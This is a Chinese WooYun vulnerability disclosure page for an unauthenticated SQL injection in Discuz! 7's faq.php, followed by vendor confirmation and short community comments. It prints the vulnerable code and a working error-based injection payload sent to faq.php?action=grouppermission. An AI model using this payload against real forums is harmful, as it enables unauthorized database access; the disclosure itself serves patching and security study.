当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(235) 关注此漏洞

缺陷编号: WooYun-2014-66095

漏洞标题: Discuz7存在一处SQL注射漏洞(无需登录即可触发)

相关厂商: Discuz!

漏洞作者: Map

提交时间: 2014-06-24 18:29

公开时间: 2014-09-22 18:30

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

47人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-24: 细节已通知厂商并且等待厂商处理中
2014-06-26: 厂商已经确认,细节仅向厂商公开
2014-06-29: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-08-20: 细节向核心白帽子及相关领域专家公开
2014-08-30: 细节向普通白帽子公开
2014-09-09: 细节向实习白帽子公开
2014-09-22: 细节向公众公开

简要描述:

Disucz7 SQL注射漏洞。

详细说明:

在faq.php中使用的gids变量未被初始化。



在180行有一句排序的代码:

code 区域
ksort($gids);





而后的代码是:



code 区域
foreach($gids as $row) {
$groupids[] = $row[0];
}





$groupids[] = $row[0];

这里取了foreach后的row数组的key 0。



如果row是字符串的话,取的则是row的第一位。



那么



code 区域
$query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");





会导致一个SQL注射漏洞。



POST:

code 区域
gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#





到http://domain/faq.php?action=grouppermission就可以触发SQL注射了。



当然,GET也可以。



漏洞证明:

漏洞有些小细节:



例如

code 区域
gids[99]='&gids[100][0]=注射语句。





为了让ksort后我们的注射语句能注射,那么注射语句的key一定要比破坏单引号的那个\的key大一点。



所以gids的第一个是99,第二个是100.



另外,为了让单引号能被破坏掉,第一个的gids[99]是个字符串而不是数组,而gids[100]则必须得是数组。



dz72.JPG







修复方案:

初始化gids。

版权声明:转载请注明来源 Map@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-26 09:51

厂商回复:

感谢您指出的问题,我们会尽快处理!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2014-06-24 18:29 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    4

  2. 2014-06-24 18:30 | 带馅儿馒头 认证白帽子 ( 核心白帽子 | Rank:1367 漏洞数:154 | 心在,梦在)
    2

    火钳刘明

  3. 2014-06-24 18:31 | yes-i do ( 路人 | Rank:18 漏洞数:4 | yes-i do)
    1

    mark

  4. 2014-06-24 18:31 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )
    1

    难得前排一次

  5. 2014-06-24 18:32 | Kevini ( 路人 | Rank:14 漏洞数:4 | 很惭愧 就做了一点微小的工作。)
    1

    难得前排一次

  6. 2014-06-24 18:40 | roker ( 普通白帽子 | Rank:372 漏洞数:109 )
    2

    mark

  7. 2014-06-24 18:41 | 紫衣大侠 ( 普通白帽子 | Rank:296 漏洞数:30 | 打杂的~~)
    1

    叼。。

  8. 2014-06-24 18:48 | JJ Fly ( 普通白帽子 | Rank:317 漏洞数:59 | 冰眼信息科技安全研究院)
    3

    这么吊。

  9. 2014-06-24 18:50 | 微尘 ( 普通白帽子 | Rank:226 漏洞数:76 )
    4

    你这么叼你家里人知道吗?

  10. 2014-06-24 18:53 | Noxxx ( 普通白帽子 | Rank:700 漏洞数:55 )
    1

    刘明

  11. 2014-06-24 19:15 | 记得 ( 路人 | Rank:8 漏洞数:3 | 人 生 若 只 如 初 見)
    1

    打酱油

  12. 2014-06-24 19:32 | Melody ( 路人 | Rank:5 漏洞数:3 | 啊)
    1

    已关注,好屌好屌

  13. 2014-06-24 19:53 | YouYaX(乌云厂商)
    3

    指的7.2版本???

  14. 2014-06-24 19:59 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
    1

    这是要发啊

  15. 2014-06-24 20:13 | 小学猹 ( 实习白帽子 | Rank:81 漏洞数:30 | 暮春者,春服既成,冠者五六人,童子六七人...)
    1

    这是要发啊

  16. 2014-06-24 20:28 | 天朝城管 ( 普通白帽子 | Rank:117 漏洞数:36 | 不要等到命玩你的时候才开始玩命)
    1

    膜拜

  17. 2014-06-24 20:52 | px1624 ( 普通白帽子 | Rank:1104 漏洞数:186 | px1624)
    1

    7.0版本么。。。

  18. 2014-06-24 22:01 | Ray ( 实习白帽子 | Rank:75 漏洞数:7 )
    1

    discuz这个词打错了。

  19. 2014-06-24 22:16 | niliu 认证白帽子 ( 核心白帽子 | Rank:1719 漏洞数:226 | 逆流而上)
    1

    @Ray 好眼力

  20. 2014-06-24 22:38 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)
    1

    NB!

  21. 2014-06-24 23:13 | M0nster ( 实习白帽子 | Rank:55 漏洞数:18 | 允许我国的艺术家先富起来)
    1

  22. 2014-06-24 23:17 | mango ( 核心白帽子 | Rank:2081 漏洞数:303 | 解决问题的第一步,是要承认问题的存在。)
    1

    这漏洞牛逼~~求详情

  23. 2014-06-24 23:43 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)
    1

    mark

  24. 2014-06-25 01:50 | 小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)
    1

    关注。。。

  25. 2014-06-25 08:13 | Jasonfcku ( 路人 | Rank:13 漏洞数:2 | 小白一只,求不社。)
    2

    mark

  26. 2014-06-25 09:09 | 蓝颜 ( 实习白帽子 | Rank:42 漏洞数:29 )
    1

    火钳刘明

  27. 2014-06-25 10:21 | maples ( 实习白帽子 | Rank:42 漏洞数:11 | 学习的小菜鸟)
    1

    牛逼咯

  28. 2014-06-26 12:12 | 笨小猪 ( 路人 | Rank:16 漏洞数:2 | 杯壁下流)
    1

    MARK一下

  29. 2014-06-27 07:24 | Matt 认证白帽子 ( 普通白帽子 | Rank:523 漏洞数:107 | 承接代码审计 http://codescan.cn/)
    2

    牛逼 加入我们团队吧 codescan.cn

  30. 2014-06-29 10:20 | s3xy ( 普通白帽子 | Rank:990 漏洞数:130 | 相濡以沫,不如相忘于江湖)
    1

    mark

  31. 2014-06-29 14:08 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)
    2

    火速关注

  32. 2014-06-30 10:35 | 无面者 ( 路人 | Rank:4 漏洞数:5 | I'm a new man in security area.)
    2

    mark,洞主这是要发的节奏

  33. 2014-06-30 12:20 | Hero ( 普通白帽子 | Rank:145 漏洞数:43 | 药药切克闹,充气娃娃迷幻药)
    1

    这么叼!

  34. 2014-07-02 12:37 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)
    2

    哇....

  35. 2014-07-02 18:43 | Fireweed ( 普通白帽子 | Rank:107 漏洞数:14 | Show me the #)
    1

    哇....

  36. 2014-07-03 09:42 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
    2

    又是刷rank的节奏

  37. 2014-07-03 10:13 | FallenAngel ( 路人 | 还没有发布任何漏洞 | 啊喔呃咿呜喻。。0.0)
    1

    mark

  38. 2014-07-03 10:34 | sec_jtn ( 普通白帽子 | Rank:134 漏洞数:56 | 本想无耻的刷rank,最后发现是我想太多了。...)
    1

    工具都到手了,漏洞还没公开?

  39. 2014-07-03 22:03 | superbing ( 普通白帽子 | Rank:210 漏洞数:33 | 常羡古时儿女怀,嘻戏千山好自在。)
    1

    http://blog.jiasule.com/wp-content/uploads/2014/07/QQ%E5%9B%BE%E7%89%87201406050047351.jpg 看这张图,能发现点什么不

  40. 2014-07-04 06:48 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)
    2

    faq

  41. 2014-07-04 11:15 | Jasonfcku ( 路人 | Rank:13 漏洞数:2 | 小白一只,求不社。)
    1

    group_key

  42. 2014-09-23 11:00 | 卡农的保镖 ( 路人 | Rank:4 漏洞数:3 | 好)
    1

    以后DZ的我们怎么办!怎么办!

  43. 2015-02-05 19:59 | winalva ( 实习白帽子 | Rank:42 漏洞数:11 | rank是什么?)
    1

    @sec_jtn 有工具么0.0

登录后才能发表评论,请先 登录